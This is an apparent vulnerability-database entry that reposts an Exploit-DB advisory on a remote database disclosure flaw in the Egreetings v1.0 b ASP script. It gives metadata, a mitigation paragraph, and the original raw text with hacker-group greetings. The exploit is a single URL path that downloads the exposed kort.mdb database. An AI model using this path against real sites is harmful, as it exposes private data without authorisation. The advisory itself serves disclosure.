Egreetings v1.0 b Remote Database Disclosure Vulnerability

vendor:

Egreetings

by:

ViRuSMaN

5.5

CVSS

MEDIUM

Remote Database Disclosure

CWE

Product Name: Egreetings

Affected Version From: Egreetings v1.0 b

Affected Version To: Egreetings v1.0 b

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Egreetings v1.0 b Remote Database Disclosure Vulnerability

The Egreetings v1.0 b script has a vulnerability that allows an attacker to disclose the remote database. The exploit can be achieved by accessing the following URL: http://server/[path]/kort.mdb

Mitigation:

The vulnerability can be mitigated by ensuring that the script does not expose sensitive database files to remote access. Additionally, the script should be regularly updated to fix any security vulnerabilities.

Source

Exploit-DB raw data:

========================================================================

======
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


========================================================================

======
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
========================================================================

======
        [»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
========================================================================

======

    [»] Script:             [ Egreetings ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Systeme d envoie de cartes de voeux ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/kort.mdb

Author: ViRuSMaN <-

###########################################################################